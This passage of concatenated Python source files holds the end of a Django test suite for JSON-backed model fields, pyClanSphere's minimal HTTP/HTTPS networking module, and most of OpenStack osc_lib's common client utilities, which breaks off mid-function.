self.item = models.Item.objects.get(pk=self.item_pk)
def test_num_no_default_value_error(self):
with self.assertRaises(AttributeError):
self.item.test_num
def test_str_no_default_value_error(self):
with self.assertRaises(AttributeError):
self.item.test_str
def test_bool_no_default_value_error(self):
with self.assertRaises(AttributeError):
self.item.test_bool
def test_nullbool_no_default_value_error(self):
with self.assertRaises(AttributeError):
self.item.test_nullbool
def test_list_no_default_value_error(self):
with self.assertRaises(AttributeError):
self.item.test_list
def test_dict_no_default_value_error(self):
with self.assertRaises(AttributeError):
self.item.test_dict
class ForeignKeyRelationTestCase(TestCase):
@classmethod
def setUpClass(cls):
super(ForeignKeyRelationTestCase, cls).setUpClass()
add_fields_to_item_model(FIELDS_FK)
tag1 = models.Tag.objects.create(name='tag1')
tag2 = models.Tag.objects.create(name='tag2')
item = models.Item(name='fk')
item.fk_instance = tag1.pk
item.fk_no_instance = tag2.pk
item.save()
def setUp(self):
self.item = models.Item.objects.get(name='fk')
def test_use_instance_true(self):
tag1 = models.Tag.objects.get(name='tag1')
self.assertIsInstance(self.item.fk_instance, models.Tag)
self.assertEqual(self.item.fk_instance, tag1)
def test_use_instance_false(self):
tag2 = models.Tag.objects.get(name='tag2')
self.assertIsInstance(self.item.fk_no_instance, int)
self.assertEqual(self.item.fk_no_instance, tag2.pk)
def test_same_model_instance_assignment_use_instance_true(self):
tag = models.Tag.objects.create(name='new tag')
self.item.fk_instance = tag
self.assertEqual(self.item.fk_instance, tag)
def test_same_model_instance_assignment_use_instance_false(self):
tag = models.Tag.objects.create(name='new tag')
with self.assertRaisesRegexp(TypeError, "invalid value"):
self.item.fk_no_instance = tag
def test_int_assignment_use_instance_true(self):
tag = models.Tag.objects.create(name='new tag')
self.item.fk_instance = tag.pk
self.assertEqual(self.item.fk_instance, tag)
def test_int_instance_assignment_use_instance_false(self):
tag = models.Tag.objects.create(name='new tag')
self.item.fk_no_instance = tag.pk
self.assertEqual(self.item.fk_no_instance, tag.pk)
def test_same_model_instance_assignment_no_pk(self):
tag = models.Tag(name='new tag')
with self.assertRaisesRegexp(TypeError, "no pk"):
self.item.fk_instance = tag
def test_other_model_instance_assignment(self):
another = models.AnotherModel.objects.create(name='another instance')
with self.assertRaisesRegexp(TypeError, "invalid value"):
self.item.fk_instance = another
class ManyToManyRelationTestCase(TestCase):
@classmethod
def setUpClass(cls):
super(ManyToManyRelationTestCase, cls).setUpClass()
add_fields_to_item_model(FIELDS_M2M)
models.Tag.objects.bulk_create(
models.Tag(name='tag{}'.format(i)) for i in range(1, 5))
models.Item.objects.create(name='m2m')
def setUp(self):
self.item = models.Item.objects.get(name='m2m')
self.tags = models.Tag.objects.exclude(name='tag4')
def test_use_instance_true(self):
self.item.m2m_instance = self.tags
self.assertListEqual(list(self.item.m2m_instance), list(self.tags))
def test_use_instance_false(self):
tags_pk = [tag.pk for tag in self.tags]
self.item.m2m_no_instance = tags_pk
self.assertListEqual(self.item.m2m_no_instance, tags_pk)
def test_same_model_queryset_assignment_use_instance_true(self):
tags = models.Tag.objects.exclude(name='tag1')
self.item.m2m_instance = tags
self.assertIsInstance(self.item.m2m_instance, QuerySet)
self.assertEqual(list(self.item.m2m_instance), list(tags))
def test_same_model_queryset_assignment_use_instance_false(self):
tags_pk = [t.pk for t in
models.Tag.objects.exclude(name__in=['tag1', 'tag3'])]
self.item.m2m_no_instance = tags_pk
self.assertIsInstance(self.item.m2m_no_instance, list)
self.assertEqual(self.item.m2m_no_instance, tags_pk)
def test_int_assignment_use_instance_true(self):
tags_pk = models.Tag.objects.exclude(
name='tag3').values_list('pk', flat=True)
self.item.m2m_instance = list(tags_pk)
self.assertIsInstance(self.item.m2m_instance, QuerySet)
self.assertEqual(list(self.item.m2m_instance),
list(models.Tag.objects.filter(pk__in=tags_pk)))
def test_int_assignment_use_instance_false(self):
tags_pk = models.Tag.objects.exclude(
name='tag2').values_list('pk', flat=True)
self.item.m2m_no_instance = list(tags_pk)
self.assertIsInstance(self.item.m2m_no_instance, list)
self.assertEqual(self.item.m2m_no_instance, list(tags_pk))
def test_neg_int_assignment(self):
exclude_tag_pk = models.Tag.objects.get(name='tag3').pk
tags = models.Tag.objects.exclude(pk=exclude_tag_pk)
self.item.m2m_instance = [-exclude_tag_pk]
self.assertIsInstance(self.item.m2m_instance, QuerySet)
self.assertEqual(list(self.item.m2m_instance), list(tags))
def test_asterisk_assignment(self):
tags = models.Tag.objects.all()
self.item.m2m_instance = '*'
self.assertIsInstance(self.item.m2m_instance, QuerySet)
self.assertEqual(list(self.item.m2m_instance), list(tags))
def test_empty_assignment(self):
self.item.m2m_instance = []
self.assertIsInstance(self.item.m2m_instance, QuerySet)
self.assertEqual(list(self.item.m2m_instance), [])
def test_list_of_instances_assignment(self):
tags = [t for t in models.Tag.objects.all()]
self.item.m2m_instance = tags
self.assertIsInstance(self.item.m2m_instance, QuerySet)
self.assertEqual(list(self.item.m2m_instance), list(tags))
def test_list_of_instances_no_pk_assignment(self):
tags = [t for t in models.Tag.objects.all()]
tags.append(models.Tag(name='no pk'))
with self.assertRaisesRegexp(TypeError, "no pk"):
self.item.m2m_instance = tags
def test_list_of_instances_another_model_assignment(self):
tags = [t for t in models.Tag.objects.all()]
tags.append(models.Item(name='no pk'))
with self.assertRaisesRegexp(TypeError, "invalid value"):
self.item.m2m_instance = tags
def test_wrong_value_type_assignment(self):
tags = 'foo bar'
with self.assertRaisesRegexp(TypeError, "invalid value"):
self.item.m2m_instance = tags
class DeletionTestCase(TestCase):
@classmethod
def setUpClass(cls):
super(DeletionTestCase, cls).setUpClass()
add_fields_to_item_model(FIELDS_WITH_DEFAULT_VALUES)
add_fields_to_item_model(FIELDS_FK, no_reload=True)
add_fields_to_item_model(FIELDS_M2M, no_reload=True)
models.Item.objects.create(name='deletion')
def setUp(self):
self.item = models.Item.objects.get(name='deletion')
def test_set_and_delete(self):
self.item.test_num = TEST_NUM
self.assertEqual(self.item.test_num, TEST_NUM)
del self.item.test_num
self.assertEqual(self.item.test_num, TEST_NUM_DEFAULT)
def test_delete_already_deleted_from_json(self):
self.item.test_num = TEST_NUM
del self.item.janyson['test_num']
with self.assertRaisesRegexp(AttributeError, "test_num"):
del self.item.test_num
def test_delete_fk_cache(self):
tag = models.Tag.objects.create(name='test')
self.item.fk_instance = tag
self.assertFalse(hasattr(self.item, '_jnsn_cache'))
self.item.fk_instance
self.assertEqual(self.item._jnsn_cache['fk_instance_instance'], tag)
del self.item.fk_instance
self.assertNotIn('fk_instance_instance', self.item._jnsn_cache)
def test_delete_m2m_cache(self):
models.Tag.objects.create(name='test1')
models.Tag.objects.create(name='test2')
tags = models.Tag.objects.all()
self.item.m2m_instance = tags
self.assertFalse(hasattr(self.item, '_jnsn_cache'))
self.item.m2m_instance
self.assertEqual(
list(self.item._jnsn_cache['m2m_instance_queryset']), list(tags))
del self.item.m2m_instance
self.assertNotIn('m2m_instance_queryset', self.item._jnsn_cache)
class DirHideTestCase(TestCase):
@classmethod
def setUpClass(cls):
super(DirHideTestCase, cls).setUpClass()
add_fields_to_item_model(FIELDS_DIR_HIDE_DEFAULT)
add_fields_to_item_model(FIELDS_DIR_HIDE_NO_DEFAULT, no_reload=True)
def setUp(self):
self.item = models.Item(name='dir_hide')
def test_no_value_no_default_no_hide(self):
self.assertIn('test_no_default_no_hide', dir(self.item))
def test_no_value_no_default_hide(self):
self.assertNotIn('test_no_default_hide', dir(self.item))
def test_value_no_hide(self):
self.item.test_no_default_no_hide = 'foo'
self.assertIn('test_no_default_no_hide', dir(self.item))
def test_value_hide(self):
self.item.test_no_default_hide = 'foo'
self.assertIn('test_no_default_hide', dir(self.item))
def test_default_no_hide(self):
self.assertIn('test_default_no_hide', dir(self.item))
def test_default_hide(self):
self.assertIn('test_default_hide', dir(self.item))
class CommonFieldOptionsTestCase(TestCase):
@classmethod
def setUpClass(cls):
super(CommonFieldOptionsTestCase, cls).setUpClass()
add_fields_to_item_model(
COMMON_FIELDS_OVERRIDE, field_options=COMMON_FIELD_OPTIONS)
def setUp(self):
self.item = models.Item(name='common_field_options')
def test_no_override(self):
self.assertEqual(self.item.str1, TEST_STR_DEFAULT)
def test_override_use_default(self):
with self.assertRaises(AttributeError):
self.item.str2
def test_override_type_and_default(self):
self.assertEqual(self.item.num, TEST_NUM_DEFAULT)
class AcceptableFieldsArgTypesTestCase(TestCase):
def test_fields_as_dict_without_common_fields_options(self):
add_fields_to_item_model(COMMON_FIELDS_OVERRIDE)
item = models.Item(name='fields_as_dict')
item.num = TEST_NUM
self.assertEqual(item.num, TEST_NUM)
def test_fields_as_dict_with_common_fields_options(self):
add_fields_to_item_model(
COMMON_FIELDS_OVERRIDE, field_options=COMMON_FIELD_OPTIONS)
item = models.Item(name='fields_as_dict_with_common')
self.assertEqual(item.str1, TEST_STR_DEFAULT)
def test_fields_as_list_without_common_fields_options(self):
with self.assertRaisesRegexp(ValueError, "common field options"):
add_fields_to_item_model(['str1', 'str2'])
def test_fields_as_list_with_common_fields_options(self):
add_fields_to_item_model(
['str1', 'str2'], field_options=COMMON_FIELD_OPTIONS)
item = models.Item(name='fields_as_list_with_common')
item.str2 = TEST_STR
self.assertEqual(item.str1, TEST_STR_DEFAULT)
self.assertEqual(item.str2, TEST_STR)
def test_fields_as_str_with_common_fields_options(self):
with self.assertRaisesRegexp(TypeError, "'fields' must be"):
add_fields_to_item_model(
'str1', field_options=COMMON_FIELD_OPTIONS)
|
|
# -*- coding: utf-8 -*-
"""
pyClanSphere.utils.net
~~~~~~~~~~~~~~~~~~~~~~
This module implements various network related functions and among
others a minimal urllib implementation that supports timeouts.
:copyright: (c) 2009 - 2010 by the pyClanSphere Team,
see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
from cStringIO import StringIO, InputType
import os
import urlparse
import socket
import httplib
from werkzeug import Headers, url_decode, cached_property
from werkzeug.contrib.iterio import IterO
from pyClanSphere.application import Response, get_application
from pyClanSphere.utils.datastructures import OrderedDict
from pyClanSphere.utils.exceptions import pyClanSphereException
def open_url(url, data=None, timeout=None,
allow_internal_requests=True, **kwargs):
"""This function parses the URL and opens the connection. The
following protocols are supported:
- `http`
- `https`
    By default, requests to pyClanSphere itself trigger an internal request. This
can be disabled by setting `allow_internal_requests` to False.
"""
app = get_application()
if timeout is None:
timeout = app.cfg['default_network_timeout']
parts = urlparse.urlsplit(url)
if app is not None:
site_url = urlparse.urlsplit(app.cfg['site_url'])
if allow_internal_requests and \
parts.scheme in ('http', 'https') and \
site_url.netloc == parts.netloc and \
parts.path.startswith(site_url.path):
path = parts.path[len(site_url.path):].lstrip('/')
method = kwargs.pop('method', None)
if method is None:
method = data is not None and 'POST' or 'GET'
make_response = lambda *a: URLResponse(url, *a)
return app.perform_subrequest(path.decode('utf-8'),
url_decode(parts.query),
method, data, timeout=timeout,
response_wrapper=make_response,
**kwargs)
handler = _url_handlers.get(parts.scheme)
if handler is None:
        raise URLError('unsupported URL scheme %r' % parts.scheme)
if isinstance(data, basestring):
data = StringIO(data)
try:
obj = handler(parts, timeout, **kwargs)
return obj.open(data)
except Exception, e:
if not isinstance(e, NetException):
e = NetException('%s: %s' % (e.__class__.__name__, str(e)))
raise e
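# Example usage (illustrative only; the URL and timeout below are made up).
# The returned object is a URLResponse, so the usual Response attributes apply:
#
#     resp = open_url('http://example.com/feed.atom', timeout=10)
#     body = resp.data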
def create_connection(address, timeout=30):
"""Connect to address and return the socket object."""
msg = "getaddrinfo returns an empty list"
host, port = address
for res in socket.getaddrinfo(host, port, 0, socket.SOCK_STREAM):
af, socktype, proto, canonname, sa = res
sock = None
try:
sock = socket.socket(af, socktype, proto)
sock.settimeout(timeout)
sock.connect(sa)
return sock
except socket.error, msg:
if sock is not None:
sock.close()
raise ConnectionError(msg)
def get_content_length(data_or_fp):
"""Try to get the content length from the given string or file
pointer. If the length can't be determined the return value
is None.
"""
try:
return len(data_or_fp)
except TypeError:
# special-case cStringIO objects which have no fs entry
if isinstance(data_or_fp, InputType):
return len(data_or_fp.getvalue())
try:
            return os.fstat(data_or_fp.fileno()).st_size
except (AttributeError, OSError):
pass
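# Example (illustrative): plain strings report their length directly,
# read-only cStringIO objects fall back to getvalue(), and real file objects
# go through os.fstat():
#
#     get_content_length('hello')          # -> 5
#     get_content_length(StringIO('abc'))  # -> 3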
class NetException(pyClanSphereException):
pass
class CannotSendRequest(NetException):
pass
class BadStatusLine(NetException):
pass
class URLError(NetException):
pass
class ConnectionError(NetException):
pass
class URLHandler(object):
default_port = 0
def __init__(self, parsed_url, timeout=30):
self.parsed_url = parsed_url
self.timeout = timeout
self.closed = False
self._socket = None
self._buffer = []
@property
def addr(self):
"""The address tuple."""
netloc = self.parsed_url.netloc
if netloc.startswith('['):
host_end = netloc.find(']')
if host_end < 0:
raise URLError('invalid ipv6 address')
host = netloc[1:host_end]
port = netloc[host_end + 2:]
else:
pieces = netloc.split(':', 1)
if len(pieces) == 1:
host = pieces[0]
port = None
else:
host, port = pieces
if not port:
port = self.default_port
else:
try:
port = int(port)
except ValueError:
raise URLError('not a valid port number')
return host, port
@property
def host_string(self):
host, port = self.addr
try:
host = host.encode('ascii')
except UnicodeError:
host = host.encode('idna')
if port != self.default_port:
host = '%s:%d' % (host, port)
return host
@property
def host(self):
return self.addr[0]
@property
def port(self):
return self.addr[1]
@property
def url(self):
return urlparse.urlunsplit(self.parsed_url)
@property
def socket(self):
if self._socket is None:
if self.closed:
raise TypeError('handler closed')
self._socket = self.connect()
return self._socket
def connect(self):
return create_connection(self.addr, self.timeout)
def close(self):
if self._socket is not None:
self._socket.close()
self._socket = None
self.closed = True
def send(self, data):
if self._buffer:
self.send_buffer()
if data is None:
return
try:
if hasattr(data, 'read'):
while 1:
s = data.read(8192)
if not s:
break
self.socket.sendall(s)
else:
self.socket.sendall(data)
except socket.error, v:
if v[0] == 32: # Broken pipe
self.close()
raise
def send_buffered(self, data):
if hasattr(data, 'read'):
data = data.read()
self._buffer.append(data)
def send_buffer(self):
buffer = ''.join(self._buffer)
del self._buffer[:]
self.send(buffer)
def open(self, data=None):
"""Return a `URLResponse` object."""
return Response()
class HTTPHandler(URLHandler):
"""Opens HTTP connections."""
default_port = 80
http_version = '1.1'
STATE_IDLE, STATE_SENDING, STATE_SENT = range(3)
def __init__(self, parsed_url, timeout=30, method=None):
URLHandler.__init__(self, parsed_url, timeout)
self.headers = Headers()
self._state = self.STATE_IDLE
self._method = method
@property
def method(self):
return self._method or 'GET'
def send(self, data):
if self._state == self.STATE_IDLE:
self._state = self.STATE_SENDING
return URLHandler.send(self, data)
def send_request(self, data):
path = self.parsed_url.path or '/'
if self.parsed_url.query:
path += '?' + self.parsed_url.query
self.send_buffered('%s %s HTTP/%s\r\n' % (self._method, str(path),
self.http_version))
self.send_buffered('\r\n'.join('%s: %s' % item for item in
self.headers.to_list()) + '\r\n\r\n')
if isinstance(data, basestring):
self.send_buffered(data)
data = None
self.send(data)
self._state = self.STATE_SENT
def open(self, data=None):
# if no method is set switch between GET and POST based on
# the data. This is for example the case if the URL was
# opened with open_url().
if self._method is None:
if data is not None:
self._method = 'POST'
else:
self._method = 'GET'
if self._state != self.STATE_IDLE:
raise CannotSendRequest()
if self.http_version == '1.1':
if 'host' not in self.headers:
self.headers['Host'] = self.host_string
if 'accept-encoding' not in self.headers:
self.headers['Accept-Encoding'] = 'identity'
if 'content-length' not in self.headers:
content_length = get_content_length(data)
if content_length is not None:
self.headers['Content-Length'] = content_length
self.send_request(data)
return HTTPResponse(self)
class HTTPSHandler(HTTPHandler):
"""Opens HTTPS connections."""
default_port = 443
def __init__(self, parsed_url, timeout=30,
default_method=None, key_file=None,
cert_file=None):
HTTPHandler.__init__(self, parsed_url, timeout, default_method)
self.key_file = key_file
self.cert_file = cert_file
def connect(self):
try:
# 2.6 and higher
from ssl import wrap_socket
except ImportError:
# 2.4 and 2.5
from httplib import FakeSocket
def wrap_socket(sock, key, cert):
ssl = socket.ssl(sock, key, cert)
return FakeSocket(sock, ssl)
return wrap_socket(HTTPHandler.connect(self),
self.key_file, self.cert_file)
class URLResponse(Response):
def __init__(self, url, body, status=200, headers=None):
Response.__init__(self, body, status, headers)
self.url = url
@cached_property
def stream(self):
return IterO(self.response)
class HTTPResponse(URLResponse):
def __init__(self, http_handler):
self._socket = http_handler.socket
resp = httplib.HTTPResponse(self._socket,
method=http_handler._method)
resp.begin()
headers = resp.getheaders()
def make_iterable():
while 1:
                data = resp.read(8192)
if not data:
break
yield data
URLResponse.__init__(self, http_handler.url, make_iterable(),
resp.status, headers)
self._httplib_resp = resp
def close(self):
Response.close(self)
if self._socket is not None:
self._socket.close()
self._socket = None
if self._httplib_resp is not None:
self._httplib_resp.close()
self._httplib_resp = None
_url_handlers = {
'http': HTTPHandler,
'https': HTTPSHandler
}
|
|
# Copyright 2012-2013 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
"""Common client utilities"""
import copy
import getpass
import logging
import os
import six
import time
import warnings
from cliff import columns as cliff_columns
from oslo_utils import importutils
from osc_lib import exceptions
from osc_lib.i18n import _
LOG = logging.getLogger(__name__)
def backward_compat_col_lister(column_headers, columns, column_map):
"""Convert the column headers to keep column backward compatibility.
    Replace the new column names in the column headers with the old ones, so
    that the old column names can still be requested via the --column/-c
    option, like: volume list -c 'Display Name'
:param column_headers: The column headers to be output in list command.
:param columns: The columns to be output.
:param column_map: The key of map is old column name, the value is new
column name, like: {'old_col': 'new_col'}
"""
if not columns:
return column_headers
# NOTE(RuiChen): column_headers may be a tuple in some code, like:
# volume v1, convert it to a list in order to change
# the column name.
column_headers = list(column_headers)
for old_col, new_col in six.iteritems(column_map):
if old_col in columns:
            LOG.warning(_('The column "%(old_column)s" has been deprecated, '
                          'please use "%(new_column)s" instead.') % {
'old_column': old_col,
'new_column': new_col}
)
if new_col in column_headers:
column_headers[column_headers.index(new_col)] = old_col
return column_headers
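# Example (illustrative; mirrors the volume v1 'Display Name' -> 'Name' case):
#
#     backward_compat_col_lister(
#         ['Name', 'Size'], ['Display Name'], {'Display Name': 'Name'})
#     # -> ['Display Name', 'Size']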
def backward_compat_col_showone(show_object, columns, column_map):
"""Convert the output object to keep column backward compatibility.
    Replace the new column names in the output object with the old ones, so
    that the old column names can still be requested via the --column/-c
    option, like: volume show -c 'display_name'
:param show_object: The object to be output in create/show commands.
:param columns: The columns to be output.
:param column_map: The key of map is old column name, the value is new
column name, like: {'old_col': 'new_col'}
"""
if not columns:
return show_object
show_object = copy.deepcopy(show_object)
for old_col, new_col in six.iteritems(column_map):
if old_col in columns:
            LOG.warning(_('The column "%(old_column)s" has been deprecated, '
                          'please use "%(new_column)s" instead.') % {
'old_column': old_col,
'new_column': new_col}
)
if new_col in show_object:
show_object.update({old_col: show_object.pop(new_col)})
return show_object
def build_kwargs_dict(arg_name, value):
"""Return a dictionary containing `arg_name` if `value` is set."""
kwargs = {}
if value:
kwargs[arg_name] = value
return kwargs
def calculate_header_and_attrs(column_headers, attrs, parsed_args):
"""Calculate headers and attribute names based on parsed_args.column.
When --column (-c) option is specified, this function calculates
column headers and expected API attribute names according to
the OSC header/column definitions.
This function also adjusts the content of parsed_args.columns
if API attribute names are used in parsed_args.columns.
This allows users to specify API attribute names in -c option.
:param column_headers: A tuple/list of column headers to display
:param attrs: a tuple/list of API attribute names. The order of
corresponding column header and API attribute name must match.
:param parsed_args: Parsed argument object returned by argparse parse_args
:returns: A tuple of calculated headers and API attribute names.
"""
if parsed_args.columns:
header_attr_map = dict(zip(column_headers, attrs))
expected_attrs = [header_attr_map.get(c, c)
for c in parsed_args.columns]
attr_header_map = dict(zip(attrs, column_headers))
expected_headers = [attr_header_map.get(c, c)
for c in parsed_args.columns]
# If attribute name is used in parsed_args.columns
# convert it into display names because cliff expects
# name in parsed_args.columns and name in column_headers matches.
parsed_args.columns = expected_headers
return expected_headers, expected_attrs
else:
return column_headers, attrs
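# Example (illustrative; parsed_args is whatever argparse returned):
#
#     headers, attrs = calculate_header_and_attrs(
#         ('ID', 'Name'), ('id', 'name'), parsed_args)
#     # with parsed_args.columns == ['id'] this returns (['ID'], ['id'])
#     # and rewrites parsed_args.columns to ['ID'] so cliff can match it.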
def env(*vars, **kwargs):
"""Search for the first defined of possibly many env vars
Returns the first environment variable defined in vars, or
returns the default defined in kwargs.
"""
for v in vars:
value = os.environ.get(v, None)
if value:
return value
return kwargs.get('default', '')
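# Example (illustrative; the variable names are just the conventional ones):
#
#     username = env('OS_USERNAME', 'USERNAME', default='demo')
#     # returns the first defined environment variable, or 'demo' if none is set.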
def find_min_match(items, sort_attr, **kwargs):
"""Find all resources meeting the given minimum constraints
:param items: A List of objects to consider
:param sort_attr: Attribute to sort the resulting list
:param kwargs: A dict of attributes and their minimum values
    :rtype: A list of resources sorted by sort_attr that meet the minimums
"""
    def minimum_pieces_of_flair(item):
        """Find lowest value greater than the minimum"""
result = True
for k in kwargs:
# AND together all of the given attribute results
result = result and kwargs[k] <= get_field(item, k)
return result
return sort_items(filter(minimum_pieces_of_flair, items), sort_attr)
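# Example (illustrative; 'flavors' stands in for any list of resources):
#
#     candidates = find_min_match(flavors, 'ram', ram=4096, vcpus=2)
#     # every returned flavor has ram >= 4096 and vcpus >= 2, sorted by 'ram'.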
def find_resource(manager, name_or_id, **kwargs):
"""Helper for the _find_* methods.
:param manager: A client manager class
:param name_or_id: The resource we are trying to find
:param kwargs: To be used in calling .find()
:rtype: The found resource
This method will attempt to find a resource in a variety of ways.
Primarily .get() methods will be called with `name_or_id` as an integer
value, and tried again as a string value.
If both fail, then a .find() is attempted, which is essentially calling
a .list() function with a 'name' query parameter that is set to
`name_or_id`.
Lastly, if any kwargs are passed in, they will be treated as additional
query parameters. This is particularly handy in the case of finding
resources in a domain.
"""
# Case 1: name_or_id is an ID, we need to call get() directly
# for example: /projects/454ad1c743e24edcad846d1118837cac
# For some projects, the name only will work. For keystone, this is not
# enough information, and domain information is necessary.
try:
return manager.get(name_or_id)
except Exception:
pass
if kwargs:
# Case 2: name_or_id is a name, but we have query args in kwargs
# for example: /projects/demo&domain_id=30524568d64447fbb3fa8b7891c10dd
try:
return manager.get(name_or_id, **kwargs)
except Exception:
pass
# Case 3: Try to get entity as integer id. Keystone does not have integer
# IDs, they are UUIDs, but some things in nova do, like flavors.
try:
if isinstance(name_or_id, int) or name_or_id.isdigit():
return manager.get(int(name_or_id), **kwargs)
# FIXME(dtroyer): The exception to catch here is dependent on which
# client library the manager passed in belongs to.
# Eventually this should be pulled from a common set
# of client exceptions.
except Exception as ex:
if (type(ex).__name__ == 'NotFound' or
type(ex).__name__ == 'HTTPNotFound' or
type(ex).__name__ == 'TypeError'):
pass
else:
raise
# Case 4: Try to use find.
# Reset the kwargs here for find
if len(kwargs) == 0:
kwargs = {}
try:
# Prepare the kwargs for calling find
if 'NAME_ATTR' in manager.resource_class.__dict__:
# novaclient does this for oddball resources
kwargs[manager.resource_class.NAME_ATTR] = name_or_id
else:
kwargs['name'] = name_or_id
except Exception:
pass
# finally try to find entity by name
try:
return manager.find(**kwargs)
# FIXME(dtroyer): The exception to catch here is dependent on which
# client library the manager passed in belongs to.
# Eventually this should be pulled from a common set
# of client exceptions.
except Exception as ex:
if type(ex).__name__ == 'NotFound':
msg = _(
"No %(resource)s with a name or ID of '%(id)s' exists."
)
raise exceptions.CommandError(msg % {
'resource': manager.resource_class.__name__.lower(),
'id': name_or_id,
})
if type(ex).__name__ == 'NoUniqueMatch':
msg = _(
"More than one %(resource)s exists with the name '%(id)s'."
)
raise exceptions.CommandError(msg % {
'resource': manager.resource_class.__name__.lower(),
'id': name_or_id,
})
if type(ex).__name__ == 'Forbidden':
msg = _(
"You are not authorized to find %(resource)s with the "
"name '%(id)s'."
)
raise exceptions.CommandError(msg % {
'resource': manager.resource_class.__name__.lower(),
'id': name_or_id,
})
else:
pass
    # Case 5: For clients with no find function, list all resources and hope
# to find a matching name or ID.
count = 0
for resource in manager.list():
if (resource.get('id') == name_or_id or
resource.get('name') == name_or_id):
count += 1
_resource = resource
if count == 0:
# we found no match, report back this error:
msg = _("Could not find resource %s")
raise exceptions.CommandError(msg % name_or_id)
elif count == 1:
return _resource
else:
# we found multiple matches, report back this error
msg = _("More than one resource exists with the name or ID '%s'.")
raise exceptions.CommandError(msg % name_or_id)
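# Example (illustrative; the manager objects are hypothetical):
#
#     server = find_resource(compute_client.servers, 'my-server')
#     project = find_resource(identity_client.projects, 'demo',
#                             domain_id='default')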
def format_dict(data, prefix=None):
"""Return a formatted string of key value pairs
:param data: a dict
:param prefix: the current parent keys in a recursive call
:rtype: a string formatted to key='value'
"""
if data is None:
return None
output = ""
for s in sorted(data):
if prefix:
key_str = ".".join([prefix, s])
else:
key_str = s
if isinstance(data[s], dict):
# NOTE(dtroyer): Only append the separator chars here, quoting
# is completely handled in the terminal case.
output = output + format_dict(data[s], prefix=key_str) + ", "
else:
output = output + key_str + "='" + six.text_type(data[s]) + "', "
return output[:-2]
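# Example (illustrative): nested dicts are flattened into dotted keys.
#
#     format_dict({'a': 1, 'b': {'c': 2}})
#     # -> "a='1', b.c='2'"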
def format_dict_of_list(data, separator='; '):
"""Return a formatted string of key value pair
:param data: a dict, key is string, value is a list of string, for example:
{u'public': [u'2001:db8::8', u'172.24.4.6']}
:param separator: the separator to use between key/value pair
(default: '; ')
    :return: a string of key=value pairs, where each value is a formatted
        list and the pairs are joined by the given separator
"""
if data is None:
return None
output = []
for key in sorted(data):
value = data[key]
if value is None:
continue
value_str = format_list(value)
group = "%s=%s" % (key, value_str)
output.append(group)
return separator.join(output)
def format_list(data, separator=', '):
    """Return a formatted string
:param data: a list of strings
:param separator: the separator to use between strings (default: ', ')
:rtype: a string formatted based on separator
"""
if data is None:
return None
return separator.join(sorted(data))
def format_list_of_dicts(data):
"""Return a formatted string of key value pairs for each dict
:param data: a list of dicts
:rtype: a string formatted to key='value' with dicts separated by new line
"""
if data is None:
return None
return '\n'.join(format_dict(i) for i in data)
def format_size(size):
"""Display size of a resource in a human readable format
:param string size:
The size of the resource in bytes.
:returns:
Returns the size in human-friendly format
    :rtype: string
This function converts the size (provided in bytes) of a resource
into a human-friendly format such as K, M, G, T, P, E, Z
"""
suffix = ['', 'K', 'M', 'G', 'T', 'P', 'E', 'Z']
base = 1000.0
index = 0
if size is None:
size = 0
while size >= base:
index = index + 1
size = size / base
padded = '%.1f' % size
stripped = padded.rstrip('0').rstrip('.')
return '%s%s' % (stripped, suffix[index])
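# Example (illustrative): sizes are scaled by powers of 1000 and trailing
# zeros are stripped.
#
#     format_size(1234)  # -> '1.2K'
#     format_size(9e9)   # -> '9G'
#     format_size(None)  # -> '0'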
def get_client_class(api_name, version, version_map):
"""Returns the client class for the requested API version
:param api_name: the name of the API, e.g. 'compute', 'image', etc
:param version: the requested API version
:param version_map: a dict of client classes keyed by version
:rtype: a client class for the requested API version
"""
try:
client_path = version_map[str(version)]
except (KeyError, ValueError):
sorted_versions = sorted(version_map.keys(),
key=lambda s: list(map(int, s.split('.'))))
        msg = _(
            "Invalid %(api_name)s client version '%(version)s'; "
            "must be one of: %(version_map)s"
)
raise exceptions.UnsupportedVersion(msg % {
'api_name': api_name,
'version': version,
'version_map': ', '.join(sorted_versions),
})
return importutils.import_class(client_path)
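# Example (a sketch; the version map contents are up to the caller):
#
#     API_VERSIONS = {'2': 'novaclient.v2.client.Client'}
#     client_cls = get_client_class('compute', 2, API_VERSIONS)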
def get_dict_properties(item, fields, mixed_case_fields=None, formatters=None):
"""Return a tuple containing the item properties.
:param item: a single dict resource
:param fields: tuple of strings with the desired field names
:param mixed_case_fields: tuple of field names to preserve case
:param formatters: dictionary mapping field names to callables
to format the values
"""
if mixed_case_fields is None:
mixed_case_fields = []
if formatters is None:
formatters = {}
row = []
for field in fields:
if field in mixed_case_fields:
field_name = field.replace(' ', '_')
else:
field_name = field.lower().replace(' ', '_')
data = item[field_name] if field_name in item else ''
if field in formatters:
formatter = formatters[field]
if (isinstance(formatter, type) and issubclass(
formatter, cliff_columns.FormattableColumn)):
data = formatter(data)
elif callable(formatter):
warnings.warn(
'The usage of formatter functions is now discouraged. '
'Consider using cliff.columns.FormattableColumn instead. '
'See reviews linked with bug 1687955 for more detail.',
category=DeprecationWarning)
if data is not None:
data = formatter(data)
else:
msg = "Invalid formatter provided."
raise exceptions.CommandError(msg)
row.append(data)
return tuple(row)
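# Example (illustrative): display headers are lower-cased and spaces become
# underscores before the dict lookup.
#
#     get_dict_properties({'id': 'abc', 'display_name': 'vol1'},
#                         ('ID', 'Display Name'))
#     # -> ('abc', 'vol1')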
def get_effective_log_level():
"""Returns the lowest logging level considered by logging handlers
Retrieve and return the smallest log level set among the root
logger's handlers (in case of multiple handlers).
"""
root_log = logging.getLogger()
min_log_lvl = logging.CRITICAL
for handler in root_log.handlers:
min_log_lvl = min(min_log_lvl, handler.level)
return min_log_lvl
def get_field(item, field):
try:
if isinstance(item, dict):
return item[field]
else:
return getattr(item, field)
except Exception:
msg = _("Resource doesn't have field %s")
raise exceptions.CommandError(msg % field)
def get_item_properties(item, fields, mixed_case_fields=None, formatters=None):
"""Return a tuple containing the item properties.
:param item: a single item resource (e.g. Server, Project, etc)
:param fields: tuple of strings with the desired field names
:param mixed_case_fields: tuple of field names to preserve case
:param formatters: dictionary mapping field names to callables
to format the values
"""
if mixed_case_fields is None:
mixed_case_fields = []
if formatters is None:
formatters = {}
row = []
for field in fields:
